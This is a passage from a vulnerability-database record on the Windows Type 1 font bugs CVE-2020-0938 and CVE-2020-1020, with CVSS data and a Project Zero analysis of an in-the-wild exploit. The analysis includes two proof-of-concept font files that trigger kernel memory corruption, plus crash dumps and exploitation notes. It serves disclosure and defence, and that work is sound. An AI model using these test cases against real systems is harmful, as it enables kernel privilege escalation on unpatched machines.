2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nThis is pretty similar to CVE-2020-1020 and its possible they were used together in a single attack, although for now this is just my theory and without full evidence this should be taken with a healthy few grains of salt.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-1020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-07-22T00:00:00", "id": "AKB:D673396D-06D8-4D50-B1AD-97679B53A487", "href": "https://attackerkb.com/topics/IE2z4hqlku/cve-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:28:45", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font \u2013 Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka \u2018Adobe Font Manager Library Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-1020.\n\n \n**Recent assessments:** \n \n**busterb** at March 24, 2020 12:11pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\n**bac2binary** at April 15, 2020 4:26pm UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\n**gwillcox-r7** at November 22, 2020 2:24am UTC reported:\n\nA fairly standard policy of disabling preview windows is a good mitigation for this vulnerability. Since this appears to have been found in the wild, but I\u2019m lowering this from original assessment, due to it being patched in the latest April 2020 PT, and there wasn\u2019t a particular rush to fix it out of band.\n\nTencent has an analysis of the vulnerabilities based on the PT diffs: <https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg>\n\nFrom the MSRC advisory, this has limited impact on Windows 10.\n\n> For systems running supported versions of Windows 10 a successful attack could only result in code execution within an AppContainer sandbox context with limited privileges and capabilities.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "ADV200006 - Type 1 Font Parsing Remote Code Execution Vulnerability in Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2020-09-02T00:00:00", "id": "AKB:59EFDEC4-921E-411A-8743-CB603C4BC068", "href": "https://attackerkb.com/topics/P39wRxHASb/adv200006---type-1-font-parsing-remote-code-execution-vulnerability-in-windows", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. This CVE ID is unique from CVE-2020-1020.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-0938", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. This CVE ID is unique from CVE-2020-0938.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-1020", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T11:47:38", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1020.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-0938", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-0938", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0938", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2022-07-13T16:00:28", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-15T15:15:00", "type": "cve", "title": "CVE-2020-1020", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2020-1020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1020", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}], "googleprojectzero": [{"lastseen": "2021-07-30T19:23:23", "description": "This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the [introduction post](<https://googleprojectzero.blogspot.com/2021/01/introducing-in-wild-series.html>).\n\nPosted by Mateusz Jurczyk and Sergei Glazunov, Project Zero\n\nIn this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.\n\n## 1\\. Font vulnerabilities on Windows \u2264 8.1 (CVE-2020-0938, CVE-2020-1020)\n\n### Background\n\nThe Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called \"Multiple Master Fonts\", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the [blend operator](<https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html>)).\n\nOn Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. \"CVE-2020-1027\"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome [uses](<https://bugs.chromium.org/p/chromium/issues/detail?id=365160>), so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).\n\nNevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.\n\n### Font bug #1\n\nThe first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The \"VToHOrigin\" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:\n\nint ParseBlendVToHOrigin(void *arg) {\n\nFixed16_16 *ptrs[2];\n\nFixed16_16 values[2];\n\nfor (int i = 0; i < g_font->numMasters; i++) {\n\nptrs[i] = &g_font->SomeArray[arg->SomeField + i];\n\n}\n\nfor (int i = 0; i < 2; i++) {\n\nint values_read = GetOpenFixedArray(values, g_font->numMasters);\n\nif (values_read != g_font->numMasters) {\n\nreturn -8;\n\n}\n\nfor (int num = 0; num < g_font->numMasters; num++) {\n\nptrs[num][i] = values[num];\n\n}\n\n}\n\nreturn 0;\n\n} \n \n--- \n \nIn summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0\u201316, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:\n\n... \n \n--- \n \nRSP + 0x30\n\n| \n\nptrs[0] \n \nRSP + 0x38\n\n| \n\nptrs[1] \n \nRSP + 0x40\n\n| \n\nsaved RDI \n \nRSP + 0x48\n\n| \n\nreturn address \n \nRSP + 0x50\n\n| \n\nvalues[0 .. 1] \n \nRSP + 0x58\n\n| \n\nsaved RBX \n \nRSP + 0x60\n\n| \n\nsaved RSI \n \n... \n \nThe green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.\n\nAfter the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.\n\nA proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 \\+ type1 utilities as part of [AFDKO](<https://github.com/adobe-type-tools/afdko/>)) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:\n\n~%!PS-AdobeFont-1.0: Test 001.001\n\ndict begin\n\n/FontInfo begin\n\n/FullName (Test) def\n\nend\n\n/FontType 1 def\n\n/FontMatrix [0.001 0 0 0.001 0 0] def\n\n/WeightVector [0 0 0 0 0] def\n\n/Private begin\n\n/Blend begin\n\n/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]\n\n/end\n\nend\n\ncurrentdict end\n\n%currentfile eexec /Private begin\n\n/CharStrings 1 begin\n\n/.notdef ## -| { endchar } |-\n\nend\n\nend\n\nmark %currentfile closefile\n\ncleartomark \n \n--- \n \nThe first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\nArguments:\n\nArg1: ffffffff41414141, memory referenced.\n\nArg2: 0000000000000001, value 0 = read operation, 1 = write operation.\n\nArg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory\n\naddress.\n\nArg4: 0000000000000002, (reserved)\n\n[...]\n\nTRAP_FRAME: ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)\n\nNOTE: The trap frame does not contain all registers.\n\nSome register values may be zeroed or incorrect.\n\nrax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141\n\nrdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000\n\nrip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000\n\nr8=0000000000000000 r9=000000000000000e r10=0000000000000000\n\nr11=00000000fffffffb r12=0000000000000000 r13=0000000000000000\n\nr14=0000000000000000 r15=0000000000000000\n\niopl=0 nv up ei pl nz na po cy\n\nATMFD+0x22144:\n\nfffff96000a86144 890499 mov dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????\n\nResetting default scope \n \n--- \n \n### Font bug #2\n\nThe second issue was found in the processing of the /BlendDesignPositions object, which is defined in the [Adobe Font Metrics File Format Specification](<https://www.adobe.com/content/dam/acom/en/devnet/font/pdfs/5004.AFM_Spec.pdf>) document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:\n\nint SetBlendDesignPositions(void *arg) {\n\nint num_master;\n\nFixed16_16 values[16][15];\n\nfor (num_master = 0; ; num_master++) {\n\nif (GetToken() != TOKEN_OPEN) {\n\nbreak;\n\n}\n\nint values_read = GetOpenFixedArray(&values[num_master], 15);\n\nSetNumAxes(values_read);\n\n}\n\nSetNumMasters(num_master);\n\nfor (int i = 0; i < num_master; i++) {\n\nprocs->BlendDesignPositions(i, &values[i]);\n\n}\n\nreturn 0;\n\n} \n \n--- \n \nThe bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.\n\nTo trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:\n\n~%!PS-AdobeFont-1.0: Test 001.001\n\ndict begin\n\n/FontInfo begin\n\n/FullName (Test) def\n\nend\n\n/FontType 1 def\n\n/FontMatrix [0.001 0 0 0.001 0 0] def\n\n/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]\n\n/Private begin\n\n/Blend begin\n\n/end\n\nend\n\ncurrentdict end\n\n%currentfile eexec /Private begin\n\n/CharStrings 1 begin\n\n/.notdef ## -| { endchar } |-\n\nend\n\nend\n\nmark %currentfile closefile\n\ncleartomark \n \n--- \n \nIn the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\nArguments:\n\nArg1: ffffffff41414141, memory referenced.\n\nArg2: 0000000000000008, value 0 = read operation, 1 = write operation.\n\nArg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory\n\naddress.\n\nArg4: 0000000000000002, (reserved)\n\n[...]\n\nTRAP_FRAME: ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)\n\nNOTE: The trap frame does not contain all registers.\n\nSome register values may be zeroed or incorrect.\n\nrax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000\n\nrdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000\n\nrip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002\n\nr8=0000000000000618 r9=0000000000000024 r10=fffff90000002000\n\nr11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000\n\nr14=0000000000000000 r15=0000000000000000\n\niopl=0 nv up ei ng nz na po nc\n\nffffffff`41414141 ?? ???\n\nResetting default scope \n \n--- \n \n### Exploitation\n\nAccording to our analysis, the font exploit supported the following Windows versions:\n\n * Windows 8.1 (NT 6.3)\n * Windows 8 (NT 6.2)\n * Windows 7 (NT 6.1)\n * Windows Vista (NT 6.0)\n\nWhen run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed [here](<https://googleprojectzero.blogspot.com/2015/08/one-font-vulnerability-to-rule-them-all_13.html>)), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.\n\nThings get more complicated on Windows 8.1, where the session space is no longer executable:\n\n0: kd> !pte fffff90000000000\n\nPXE at FFFFF6FB7DBEDF90 \n\ncontains 0000000115879863 \n\npfn 115879 ---DA--KWEV \n\nPPE at FFFFF6FB7DBF2000\n\ncontains 0000000115878863\n\npfn 115878 ---DA--KWEV\n\nPDE at FFFFF6FB7E400000\n\ncontains 0000000115877863\n\npfn 115877 ---DA--KWEV\n\nPTE at FFFFF6FC80000000\n\ncontains 8000000115976863\n\npfn 115976 ---DA--KW-V \n \n--- \n \nAs a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address \u2013 the [shared user data](<https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/kuser_shared_data/index.htm>) region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the 